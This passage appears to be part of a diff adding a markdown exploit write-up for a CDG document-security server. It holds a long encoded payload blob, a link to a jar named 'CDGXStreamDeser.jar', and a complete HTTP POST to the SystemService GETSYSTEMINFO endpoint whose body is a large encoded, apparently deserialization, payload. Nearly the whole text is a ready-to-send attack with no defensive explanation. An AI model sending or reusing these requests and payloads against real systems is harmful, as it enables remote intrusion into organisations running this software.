FAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1704465942446-8888d388-070e-4fc5-b578-31729f3c0fa5.png](./img/Ee_yrEjypi5abc_7/1704465942446-8888d388-070e-4fc5-b578-31729f3c0fa5-763772.png)[CDGXStreamDeser.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1713621694456-7a7df27a-64ca-4263-a548-95e26a966195.jar)
+
+![1704466100552-562404fe-f385-49fb-99f0-dc58c369894a.png](./img/Ee_yrEjypi5abc_7/1704466100552-562404fe-f385-49fb-99f0-dc58c369894a-122353.png)
+
+```java
+POST /CDGServer3/SystemService?command=GETSYSTEMINFO HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHHCPOCOLGKHOCMKILNFPJNJNDKKBHFIBMPOAPPBHJGLMDNMELIJGAGMEDAAIAKBOACALHCOMMJMEPMHDMAMOJOJCAPGBMMDLDNECINFJNHDJCFMFJHINNOAHKEDGIGEDKMLJFHEALCPEMAAEIMNGMPMMLHNJCMJFHILCLMEGEDEKEFIPFPNPMEBOMNEFEENHAAJPHGLDELDFIIHECHJOBFPJOJHLMELOHIIONFLCNKKNLKDCHGPHAACCPFECIMGFKHOGIMDEFPEFDGOBMJMJNBIICCONJOIGOKNIMLHCOKALPCBKLOPJJDODFKAMBMPFBJAEJFONBJKJEBJIJNPMLFMHDEICIGDJBMGJKAPDEJIMGECNAKHNJIHNGCLGLJOBFBECNCAGHLFDHCCCLEEOELOPCNJBHLKLOOJEEFHLDJKBEPBLDDJMPDCFEFGMOKJLKNEFLPLFOJMAONELNOMHKCJKMELHDKKBGFJDNHHLFJGPLLINOCGBOHOJFBNMICJJAIBBEMOKENOIDIOLCMNPPDBKMMEIICBMNPCHBLOGGHPMNAFELCJPFJAGJMFKLHHPEFHNILEHJEGMPCKKACELLHGEBAFJFEBEGFDAGBNNFMEGMFNPHBMPALCFPAMJBNCOLDEKJOFGNGPOMODNJANPOPAHIBJPEHDHBLKOPJNGLIHCHONILIOBJFAOBMBAOPKKKDPGPEIBFMJNJCIBAJNKBJJDHDINEFPLOADFEJDNKNOCCHACNGLDCCNHMPLPDECKGNPHGMENKLIDPCNHHDDOGDBHPBOBMCLLFEADDOHNFHOBDMMPIJJAPHLNOHBJBLDGEMFPPNLFKBJLPFKBOHGAJGKIFKLIENLNKFIJBLKMPMAONDPMMLMLBKDMDEHNNFJIHEHACAFALGJEKBNOLPJJBOFOBNHADHOPFEPAEBOIANGLDNCIEDIBJKIEBNPBIBEAGHKHDCGOJFINLBMOMGEONNADMIBBDDKLOECOJKKKCODGIOPPLMKBLAEJKBELPJBICHBHAPGPFIHPHOHOCEKPMGDOGGHGLKEJOKLLOKBEFJEAAFGMNGBIEJPFFKELOCGLAPCFAPMKPOCKIOCFMJACHOFNBIGDOMHKFEGGEOKKPNAPKNOJAODCLMECCLBGEEHKEPBKBLDECNKAPCADCKAGMKMNGHLMPPKKAMCIECLGNFKCELDIJJEHPDFHELFIEBDCCGJFDMOBBIIBELMOMLBMPNABDLHINGECDPJNPHADFGKBGGDIJKIFDMBBCBEPNGOBICHICPEEIJEDHOEPCMMOLEBDPFNAPAAPAOKLEJDNCJJGCPMHLCJFDJMMEEIKIBMPDJJHKPNJAJMKDGEHMLKHOEKGHDMOPFOKKJMGIDDHHPKCBGLGPLLFMPAEKOOCGHKONEODICAKJPGNODMNLBFBKAHNHBDDPNMHOPLJOEEDHPGEJPGFBFGDFMALHEOGJODGOCKMAHFLBLPOLNOLHFPFNMPBCJGBHJCGPMNAFMJEJHGNPLONPLMCFMJIODDNLGLGFBONGJNKFOIGLLMINPABCNKMOHLMEMKHCGHEABKOFGANPKDICKCJEOHNIKNNLIKLBPJKDLFKKNLGINJOMCEPCNEHBIOFGJCILGDOHLCIMHAFPHNGFAHIOJEBMMKDOCAEBPOFJLCDMLLCDIJKLIEKFGGIDFFONPHGDJCFHGPGGIOLEJGDPIEFNGGJMPKIEAHLOGCOAJDMOKCNDPICFDILJLAMCLCHLBLJINBJNLGFCDIAJCNOCDNPHHACDLGBECEPBDEOIPNOAKLJIMKBJAPANFKNOKJBOGMINNCMOLFMGFFCDGPBAGDHJOIMHNPLDCKMEJGEMANOKDLPFBLGJKDBMBNLBOLCHHCPEOMBOJFMECMMJEBNPNOMNLLNLGBPNGAEHMDCFBMDMGPFPPGIKCCLAGEHFMCKODFDJGLNJEEJBDDIPMLEJDMOHBHJBFMNDLNEAANKMGLAGAJMPBIDJIKLBDBAFDNCOPDAHHOANIKFAENPBJHHKEKOLALMJMOLPAOKIMIEFEGIFIGMGKDBAMAPAKKNDFHKKBEEPNKBLJADFMONNHGKFPLDPDACPIPEJEMEIHFEAOALHGMPLOAINJNHCAGCJPFPDEBPEIDLEGFLFMFPCIMDBHCIDNKJALMKFLJOIBPIOGDHBDFOHBHLLEBHDFCLINHKNKIJGLFHGGKHJCNFCKKMJJJHFGPBPCJCLEAPPKLGGBJKALAFFJNPNIHLEMLOCMMICCAONNHGFDMBADMMGKNKLNEMEBHPJOFCJCGNKHGCELCDPPFNDPFMEOBJDGABEAAHNDCNIOAGPGEJKNMGACFMPIBBCFGJANKHJKMPCDKIPJDJKBGMLPGLJKBAOFAJHOPFKOFONJMAJEOJPEEPOEOJMBMAIIEKNOCCKNDLHJEJDDLOGMDMHFBCMIBJHNILHADHCFOALGKJMABFCLCJMBMHHABCLKCCAFDAFFDKCIJLPMDFGODMNAAPGGKCBIDAKCANGLLOLMNIBDNDEFPKLJBEKABHKMOGMBCAABEAHPEBGCCBFLCMGCBONJHGMNGIINNNEOIOPHDNGFLMCBLFDFLGPHNHOMGLDIAHILBEGEHAFGKHEAHPKBDMACGHMLAFDJMCPNAEMFLMOEJNCCAMENLKKLOHCNBICPGBALDODFNNOHBKEBNJAMKMPLGHNNCHPPPODONMGJDOOHOFBFGLBCOPLGHHHFANKKJCFCFHABEJBKJOEMOMCEMJKEDBMDPGGDPAPDNINEBFNMNOAHHDCPOIJALHJKPMAOEEEFIBIGFEBFFLPOPNILEFMEFODPELAJDAOKFJMCLOBAFMIAKDMONILOFLLDKCLOEDBFDMKLFEEDPPBAIKNBPFDEGCLMKKJAAFIMDIMCMHMKGBOAIAELIGDLDAONJOPMHCPEJPIJEALPFHOOPFEHCAANFPMAIBFFGCFOKIFDPJEKLEEMOHNAMCDHMIBCNGLNNHNDAEIDOEPMFDHPFOPCCMBNEHIAKAIGBBPGDNFDCHHCENJNNJAOHECAGEBBPNNMLKHHGNBMGKBAHBGKNEKMBEJKKCFGPAEOIECJIEAICKECAFBNELGHGAKPHLICHMCJIMHLHCJLMOMEJOOCDNEMIFFMMGKABHDMNOEAHOCMJGKAIBMJNPCKFNLIBAIDJAHHPFODGAJPLJPGGCAKEBNIDOKFMAGHCMKJGIOMIBKLIOCBGKBBPBCDHMJOCECOCHLKFPADDPCDNBKHNCNOJEOCEELAPIDLNHODKEJKDIHNMMJPONOEECGNGABNKAAEICDHCBKAPFPOFHANJIGLFEAKNOFBEMCGGPPHHJEHAADLJCDELDBOOLBBDCKKCMDKHPJLHADFBOBOMPCJHLNIFMEKILBJMPCHPHPBONCBHLIMKCPOJFNPJEMKNHPJFPHPCKLIBNGPCLFEIHKAFNAKMGFIKGGGBFKJFNOHAKNFIOGBGECNKBJCBONDCCMNEFNBIDNCBCNLBOMJCKMCLAPAMDNLOBPDLPAGADLDMIPLHDKCHOIFMDAEHAIGJJEEKAIDOPJEGFLKEADLMFDEILALOKFKJJIIGIHLIICBABKKOKDINACKLKAFJADJMLBHANCLBANMMJJPHCMHPGIDGLEKBEJLAPGALFAGILCLNNOKAAFGDGKCEJFKGEFOKHONNALPPNJKDJMPMOMPHMOCCMIHDBFLFPIPNGCJIEGCALCFLMJPDFOBINBDOFPCBKLAKHDALKGMELMKBFCILKIPCOOCPINAHLBCNIBMJCPNGCFHIGGEKEBLKMDPJGMDLIMAMJJJJLCAJPOIBDHAJDIBMKGNODGBPBAGBOJLCCOEKLLNLMHEAIBKJEPIFDADJGOCPPBIOEJEABPIHAJJHAEHPLICJGCIJMFNNKILHAEHPNLFMLOMKAPOBEFICJEEPELNKNEHJAPLEIFEIHACIJPJNADADPLNCNIFKCJMOKLMDOCNOPDJIMADDFGAOCFLHHHGFPGAHKFEMEEBHPDPEHGOFIEFPAKFDFAHGHFCIALKJNBGNPKGMHBGGNAOJHCDFJMNHKKEMCOEDOBAJLNPLONNIBOEAOCBGNIIPFMINMDBFKDJFMJPEPDPJELGBPJKFBPMGMGNINLDCKLINMPKICHFBBAJFJIGLGKMJAEDFPIPNHPODPDALMPOAACHAKDEIOBMLNEPOJPPGDPHIABMKOACEGMCIDMGEGLAJHKOHEMEIIIINECLHGHNDADPAOIJINCJFDBGCGPEONGGHADMACBLBGICPGCPPFCLJJPCOMHCNIMACBABJFANLOEBKCDJIJPKJGBJPLNJMHHINLFODLNNKJBDELCKKPKOAMGMOJIFJLGEBBIICMLCHFEAGPPEOIPAIKGDIIGLJIGOGILIDFCGBINOKOKDENEIDCCNOIJDGOJEBNGAPAPGGNIOFNOBJEJGBKKHGGCBKALFIDIICJEKLCLOMNGBHIMFJCOBAPDGHFLMKMGEOPMIEFKBFAJECPDPBMOOEHBLCHGGMPGAFLLOKHAKHPIJJBDOMPJGKJNCLOLIDFJHGCMKMNHKNIAFBPOCJANDEBLJGHNBJLDNJENIBLAIFFHMGILPFAIOPPBELDDIAEGPKAJCBADOIHDCEFEKHCMIMLPMDFCGNPNCBMGJNOJJHDKADFHBPDNKHOHFIIGCEMCKNHPNIPGLDHOFKNKMJIFPBLPCCLPKHGINGJJHPEGDKNDHCIEEMHJBBMDOFGNGKJLOJMCCAFCHCIHBABICCIDBEENCDGLPONGELHBNKIFAFMKCEAIKIABPDFJDBIDOKLPEAGMHOKBJJFOBJOGODHEBNDINHBMAGGILFAJFIAJEAFJBADJJGGAPOBAIBHMCCDJIBPIBFPPFBMBGGKEPPDBAMMJKKJBCOPPAKNBAKJGANLHEFOPNGEOIJAOMDLEIAICCEMJFOBHDBHEKHJJAMHIIDBNKAMIGDIILOGCMEHPEBAKBKFHHMOLNBFCDFJKKABKLKGOELAILCEHNEJADNLCNLIKEOMMOINMOFGBOPBADLCECJNNHNKBPONJDMPOCOBDAHIJPCFJGAGKFCODFNHDEIKGEGNNICLPIOJLPJBLKGOCOPOEJPJGFKINGNFIFNCPCHBHLDADPFIJDFEJLHMKKOKCAOKDGKLDJGLFIGPFNKHPMCBBBCNCAIEFKECBNPMGCPLBBLMHAKDLOCDEEIOENDCBMPBLLCHOFKFHICHEBCEFGNPLPLFDHIGLBNGCDAFMJGKOGNHJBKJNPLOIEKDMPLAAEPKHNDCGPAMFEMEFEDJLPFHMKPIIJLEMGPOEOPFHLBAPMNLANEJFBBEIMIGOBKHIKHAJABOCNDHOPPJEHGOJEPKGI